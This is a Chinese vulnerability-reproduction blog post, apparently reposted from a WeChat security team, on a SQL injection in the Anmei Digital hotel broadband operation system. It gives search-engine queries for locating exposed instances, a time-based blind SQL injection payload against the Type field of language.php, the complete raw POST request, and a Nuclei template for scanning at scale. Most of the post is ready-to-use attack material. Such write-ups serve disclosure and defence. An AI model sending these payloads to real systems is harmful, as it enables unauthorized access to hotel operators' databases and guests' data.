【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

admin

102737
文章

87
评论

2024年2月16日11:25:20评论28 views1字数 2176阅读7分15秒阅读模式

资产收集

hunter：web.title=”酒店宽带运营系统”
fofa：title=”酒店宽带运营系统”
【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

页面效果

【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

漏洞复现

访问language.php。
payload如下：

EditStatus=2&LangEName=pHqghUme&LangID=1&LangName=pHqghUme&LangType=0000%E7%B3%BB%E7%BB%9F%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF&Lately=555-666-0606&Search=the&SerialID=1&Type=0'XOR(if(now()=sysdate()%2Csleep(2)%2C0))XOR'Z&UID=add&submit=%20%E6%B7%BB%20%E5%8A%A0%20

整体报文如下：

POST /language.php HTTP/1.1Host: xxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Content-Type: application/x-www-form-urlencodedContent-Length: 264EditStatus=2&LangEName=pHqghUme&LangID=1&LangName=pHqghUme&LangType=0000%E7%B3%BB%E7%BB%9F%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF&Lately=555-666-0606&Search=the&SerialID=1&Type=0'XOR(if(now()=sysdate()%2Csleep(2)%2C0))XOR'Z&UID=add&submit=%20%E6%B7%BB%20%E5%8A%A0%20

【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

Nuclei Poc

id: anmeishuzijiudianinfo:  name: anmeishuzijiudian  author: xxxx  severity: info  description: description  reference:    - https://  tags: tagsrequests:  - raw:      - |-        POST /language.php HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Connection: close        Upgrade-Insecure-Requests: 1        Sec-Fetch-Dest: document        Sec-Fetch-Mode: navigate        Sec-Fetch-Site: none        Sec-Fetch-User: ?1        Content-Type: application/x-www-form-urlencoded        Content-Length: 264        EditStatus=2&LangEName=pHqghUme&LangID=1&LangName=pHqghUme&LangType=0000%E7%B3%BB%E7%BB%9F%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF&Lately=555-666-0606&Search=the&SerialID=1&Type=0'XOR(if(now()=sysdate()%2Csleep(2)%2C0))XOR'Z&UID=add&submit=%20%E6%B7%BB%20%E5%8A%A0%20    matchers-condition: and    matchers:      - type: dsl        dsl:          - 'duration&gt;=2'      - type: status        status:          - 200

Nuclie验证

【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

原文始发于微信公众号（零点安全团队）：【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

资产收集

页面效果

漏洞复现

Nuclei Poc

Nuclie验证

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

漏洞预警 | 大华智慧园区综合管理平台远程代码执行漏洞

漏洞预警 | JeecgBoot任意文件上传漏洞

漏洞预警 | 若依druid未授权访问漏洞

发表评论

在线咨询

微信